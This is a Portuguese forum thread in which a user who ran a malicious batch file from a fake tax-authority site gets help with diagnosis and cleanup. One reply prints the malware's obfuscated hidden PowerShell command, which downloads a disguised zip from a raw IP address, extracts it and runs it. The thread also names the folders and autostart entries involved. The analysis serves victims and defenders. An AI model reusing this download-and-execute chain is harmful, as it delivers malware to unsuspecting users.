Ir ao conteúdo
Regras do Clube do Hardware

Rodei este arquivo Batch no meu PC e estou preocupado

Rmilan05

Por Rmilan05
em Vírus, malware, invasões e afins

 Compartilhar
Ir à solução Resolvido por Diego Junges,

Posts recomendados

Rmilan05
 

Rmilan05

Postado
  • Autor
Postado

 

Em 17/08/2021 às 10:59, Marcelo_gs disse:

@Rmilan05 ainda esta com o arquivo ai? Se estiver me mande uma mensagem no privado para me passar o arquivo

Bom dia Marcelo, 

 

Eu fiz uma copia e renomeei ele com a extensão TXT.

 

haviam vários linhas de comentário que tirei dele também, mas todas eram idênticas com o seguinte texto "Rem Fergie (nascida Stacy Ann Ferguson, em Hacienda Heights, 27 de março de 1975) é uma rapper, compositora, estilista"

 

Acredito que era para confundir e tirar o foco de quem abrir a bat para edição, por isso removi.

 

O nome do arquivo eu também troquei e não me lembro como era.

 

O arquivo foi baixado através de um link de um site falso da receita federal. o link não abre mais uma pagina, 

 

Desde já agradeço muito seu apoio.

 

Rmilan05
 

Rmilan05

Postado
  • Autor
Postado

Meu Pix não estava recebendo valores, minha gerente do banco disse que é uma pendencia com a receita federal, fui procurar algum meio na internet de ver que tipo de pendencia seria, cai em um site falso da receita pela pesquisa do google, cliquei para fazer consulta, preenchi o CPF e veio o arquivo para download com o suposto resultado da pendencia, desavisado eu cliquei e quando me dei conta era uma Batch que não consegui interromper a execução.

 

O arquivo foi baixado através de um link de um site falso da receita federal. o link não abre mais uma pagina

Se houver alguma maneira de reverter as ações que esta BAT fez no meu PC eu gostaria de poder tentar... desde já eu agradeço muito sua atenção e ajuda.

Marcelo_gs
 

Marcelo_gs

Postado
Postado

@Rmilan05 não sei ainda como funciona esse script que você rodou, preciso dar mais uma analisada e ja falo com certeza. Mas em geral para ter certeza que está tudo ok com sua máquina rode o antivírus do seu Windows, faça uma busca pelo seu computador, abra o gerenciador de tarefas e veja se tem algum processo estranho, qualquer coisa mande um print aqui, e você pode reiniciar o processo do explorer por via das dúvidas. Mas assim esses arquivos não tem muito com o que se preocupar, eles servem mais para problemas imediatos então se não aconteceu nada com seu PC quando executou está mais tranquilo

  • Curtir 1
  • Confuso 1
  • Moderador
Rio McCloud
 

Rio McCloud

Postado
  • Moderador
Postado

@Rmilan05 Eu aconselharia a criação de um tópico no setor Remoção de Malware. É possível ver alguns diretórios das pastas Arquivos de Programas e ProgramData no conteúdo do arquivo .bat. Ele pode ter baixado mais arquivos. A quantidade aleatória de caracteres no código aparenta ser algum tipo de ofuscação.

  • Curtir 1
  • Solução
Diego Junges
 

Diego Junges

Postado
  • Solução
Postado

Boa tarde.

 

Aqui na nossa empresa chegou também por e-mail a vários colaboradores um BAT muito parecido com esse que o colega publicou.

Depois de analisar, entendi mais ou menos o que ele faz:

 

Primeiro ele define um monte de variáveis para ofuscar os comandos.

Depois ele baixa um arquivo do caminho 15.188.238.189/meupau.torrent (que no momento já não está mais disponível, mas no e-mail que veio para nossa empresa o caminho é http://18.231.164.255/lancamento2021.torrent)

Está com extensão torrent, mas é um ZIP.

Em seguida o bat manda descompactar e executar o instalador (bin.exe) usando o powershell em modo oculto.

Tudo isso ocorre na pasta %ProgramData%\NAV-Software_-[CHAVE-CRIPTOGRAFADA]\ (ou Software-Maker[CHAVE-CRIPTOGRAFADA])

Você pode excluir essa pasta se ela estiver presente no sistema.

Notei também que são adicionadas duas entradas para iniciar automaticamente junto com o Windows (verificar msconfig.exe)

Eu só não consegui descobrir o que a aplicação instalada faz.

 

Mas o comando que executa tudo no final do bat é o seguinte:

%SystemRoot%\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command  "& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.188.238.189/meupau.torrent' 'NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip';!GOFDSJCM_GO! -s 5 ;$shell = !EXOYZB_GO!-object -com !IBGIZ_GO!;$zip = $shell.!LSZMSPI_GO!('NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip');foreach($item in $zip.items()){$shell.!LSZMSPI_GO!('NAV-Software_-[CHAVE-CRIPTOGRAFADA]').copyhere($item);};!GOFDSJCM_GO! -s 5 ;renam!PRAXCMJT_GO! -path ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\bin.~tmp') -!EXOYZB_GO!name ('NAV-Software_-[CHAVE-CRIPTOGRAFADA].~tmp');renam!PRAXCMJT_GO! -path ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\bin!XPDHZPAZJD_GO!') -!EXOYZB_GO!name ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]!XPDHZPAZJD_GO!');remov!PRAXCMJT_GO! 'NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip';!GOFDSJCM_GO! -s 5 ;!NEYRZOVD_GO! ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\NAV-Software_-[CHAVE-CRIPTOGRAFADA]!XPDHZPAZJD_GO!')}"

  • Curtir 1
Rmilan05
 

Rmilan05

Postado
  • Autor
Postado
Em 18/08/2021 às 17:22, Diego Junges disse:

Boa tarde.

 

Aqui na nossa empresa chegou também por e-mail a vários colaboradores um BAT muito parecido com esse que o colega publicou.

Depois de analisar, entendi mais ou menos o que ele faz:

 

Primeiro ele define um monte de variáveis para ofuscar os comandos.

Depois ele baixa um arquivo do caminho 15.188.238.189/meupau.torrent (que no momento já não está mais disponível, mas no e-mail que veio para nossa empresa o caminho é http://18.231.164.255/lancamento2021.torrent)

Está com extensão torrent, mas é um ZIP.

Em seguida o bat manda descompactar e executar o instalador (bin.exe) usando o powershell em modo oculto.

Tudo isso ocorre na pasta %ProgramData%\NAV-Software_-[CHAVE-CRIPTOGRAFADA]\ (ou Software-Maker[CHAVE-CRIPTOGRAFADA])

Você pode excluir essa pasta se ela estiver presente no sistema.

Notei também que são adicionadas duas entradas para iniciar automaticamente junto com o Windows (verificar msconfig.exe)

Eu só não consegui descobrir o que a aplicação instalada faz.

 

Mas o comando que executa tudo no final do bat é o seguinte:

%SystemRoot%\system32\windowsPowershell\v1.0\powershell.exe -windowstyle hidden -Command  "& {Import-Module BitsTransfer;start-BitsTransfer 'http://15.188.238.189/meupau.torrent' 'NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip';!GOFDSJCM_GO! -s 5 ;$shell = !EXOYZB_GO!-object -com !IBGIZ_GO!;$zip = $shell.!LSZMSPI_GO!('NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip');foreach($item in $zip.items()){$shell.!LSZMSPI_GO!('NAV-Software_-[CHAVE-CRIPTOGRAFADA]').copyhere($item);};!GOFDSJCM_GO! -s 5 ;renam!PRAXCMJT_GO! -path ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\bin.~tmp') -!EXOYZB_GO!name ('NAV-Software_-[CHAVE-CRIPTOGRAFADA].~tmp');renam!PRAXCMJT_GO! -path ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\bin!XPDHZPAZJD_GO!') -!EXOYZB_GO!name ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]!XPDHZPAZJD_GO!');remov!PRAXCMJT_GO! 'NAV-Software_-[CHAVE-CRIPTOGRAFADA].zip';!GOFDSJCM_GO! -s 5 ;!NEYRZOVD_GO! ('NAV-Software_-[CHAVE-CRIPTOGRAFADA]\NAV-Software_-[CHAVE-CRIPTOGRAFADA]!XPDHZPAZJD_GO!')}"

Boa tarde,

 

Verifiquei minha pasta ProgramData, realmente houve a instalação de um software, no meu caso foi o virtualbox, no seguinte diretório "C:\ProgramData\NAV-Software_-93e99c827983edd38" encontrava-se oculto e não aparecia em aplicativos de gerenciamento de programas como o CCleaner por exemplo. Verifiquei as entradas para iniciar automaticamente junto com o Windows e eram 4. 

 

Analisei o script com auxilio de um amigo e podemos concluir que se trata de um mapeamento do teclado, e leitura dos arquivos do meu disco, talvez tenha mais alguma coisa, não tenho certeza... Para minha sorte este é meu PC de uso convencional, não digitei nenhuma senha ou trabalhei com dados importantes aqui.

 

Quero agradecer enormemente a atenção de todos, em especial a você Diego.

 

Nossa comunidade é forte e eficiente. 

 

 

Rmilan05
 

Rmilan05

Postado
  • Autor
Postado
Em 19/08/2021 às 14:08, Elias Pereira disse:

@Rmilan05

 

Quase certeza que teu PC está infectado, pois tu executou o script.

Pode me informar se teus arquivos estão criptografados? Tem algum arquivo solicitando pagamento pelos arquivos?

Apareceu realmente uma pasta com arquivos Swidtag, percebi que era virus... mas não senti falta dos meus arquivos...

 

Eu deletei os arquivos com esta extensão, sugere mais alguma ação?

Em 18/08/2021 às 12:49, Rio McCloud disse:

@Rmilan05 Eu aconselharia a criação de um tópico no setor Remoção de Malware. É possível ver alguns diretórios das pastas Arquivos de Programas e ProgramData no conteúdo do arquivo .bat. Ele pode ter baixado mais arquivos. A quantidade aleatória de caracteres no código aparenta ser algum tipo de ofuscação.

Farei isso, o mais breve possivel, obrigado pela dica.

Crie uma conta ou entre para comentar

Você precisa ser um usuário para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora
 Compartilhar
Ir à lista de tópicos

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

Mais

×
×
  • Criar novo...